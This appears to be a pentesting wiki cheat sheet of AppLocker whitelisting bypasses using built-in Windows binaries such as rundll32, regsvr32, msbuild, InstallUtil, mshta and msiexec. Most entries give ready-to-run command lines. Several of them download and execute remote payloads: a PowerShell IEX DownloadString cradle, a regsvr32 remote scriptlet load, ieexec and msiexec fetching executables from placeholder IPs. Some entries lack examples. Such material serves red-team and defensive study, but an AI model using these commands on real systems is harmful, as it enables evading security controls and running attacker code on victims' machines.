Applock Bypass

From BHaFSec Pentesting Notes Wiki
Jump to: navigation, search

Credit: @Oddvarmoe https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/README.md

Rundll32.exe

rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
rundll32 shell32.dll,Control_RunDLL payload.dll

Requires admin: ?

https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/ https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7

Regsvr32.exe

regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll

Requires admin: No Bypasses:

https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302


Msbuild.exe

msbuild.exe pshell.xml

Requires admin: No

https://gist.github.com/subTee/6b236083da2fd6ddff216e434f257614 http://subt0x10.blogspot.no/2017/04/bypassing-application-whitelisting.html https://github.com/Cn33liz/MSBuildShell https://github.com/Cn33liz/MS17-012 https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/ https://www.youtube.com/watch?v=aSDEAPXaz28

Regsvcs.exe

regsvcs.exe /U regsvcs.dll regsvcs.exe regsvcs.dll

Requires admin: ?

https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ https://gist.githubusercontent.com/subTee/fb09ef511e592e6f7993/raw/e9b28e7955a5646672267a61e9685fc5a4ab5f2a/regsvcs.cs

Regasm.exe

regasm.exe /U regsvcs.dll regasm.exe regsvcs.dll

Requires admin: ?

https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ https://gist.githubusercontent.com/subTee/fb09ef511e592e6f7993/raw/e9b28e7955a5646672267a61e9685fc5a4ab5f2a/regsvcs.cs

Bginfo.exe

bginfo.exe bginfo.bgi /popup /nolicprompt

Requires admin: No

https://msitpros.com/?p=3831 https://pentestlab.blog/2017/06/05/applocker-bypass-bginfo/ https://msitpros.com/?p=3860

InstallUtil.exe

InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll

Requires admin: No

https://github.com/subTee/AllTheThings https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/ https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12 http://subt0x10.blogspot.no/2017/09/banned-file-execution-via.html

MSDT.exe

Open .diagcab package

Requires admin: ?

https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/

mshta.exe

mshta.exe evilfile.hta

Requires admin: No

https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4

Execute .Bat

cmd.exe /k < script.txt

Requires admin: No

https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_3

Execute .PS1

Get-Content script.txt | iex

Requires admin: No

https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_3

Execute .VBS

cscript.exe //E:vbscript script.txt

Requires admin: No

https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_3


PresentationHost.exe

Missing Example

Requires admin: ? https://raw.githubusercontent.com/subTee/ShmooCon-2015/master/ShmooCon-2015-Simple-WLEvasion.pdf

dfsvc.exe

Missing Example

Requires admin: ?

https://raw.githubusercontent.com/subTee/ShmooCon-2015/master/ShmooCon-2015-Simple-WLEvasion.pdf

IEExec.exe

ieexec.exe http://x.x.x.x:8080/bypass.exe

Requires admin: ?

https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/

cdb.exe

cdb.exe -cf x64_calc.wds -o notepad.exe

Requires admin: ?

http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html

dnx.exe

dnx.exe consoleapp

Requires admin: ?

https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/

rcsi.exe

rcsi.exe bypass.csx

Requires admin: ?

https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/

csi.exe

Missing example

Requires admin: ?

https://web.archive.org/web/20161008143428/http://subt0x10.blogspot.com/2016/09/application-whitelisting-bypass-csiexe.html

CPL loading location manipulation

Control.exe

Requires admin: No

https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/ https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/

msxsl.exe

msxsl.exe customers.xml script.xsl

Requires admin: No

https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/ https://gist.github.com/subTee/d9380299ff35738723cb44f230ab39a1

msiexec.exe

msiexec /quiet /i cmd.msi msiexec /q /i http://192.168.100.3/tmp/cmd.png

Requires admin: ?

https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/

cmstp.exe

cmstp.exe /ni /s c:\cmstp\CorpVPN.inf

Requires admin: No

https://msitpros.com/?p=3960 https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e

xwizard.exe

xwizard.exe argument1 argument2 DLL loading in same folder xwizard.dll

Requires admin: No

http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/

fsi.exe

fsi.exe c:\folder\d.fscript

Requires admin: No

https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 https://twitter.com/NickTyrer/status/904273264385589248 https://docs.microsoft.com/en-us/dotnet/fsharp/tutorials/fsharp-interactive/

odbcconf.exe

odbcconf -f file.rsp

Requires admin: ?

https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b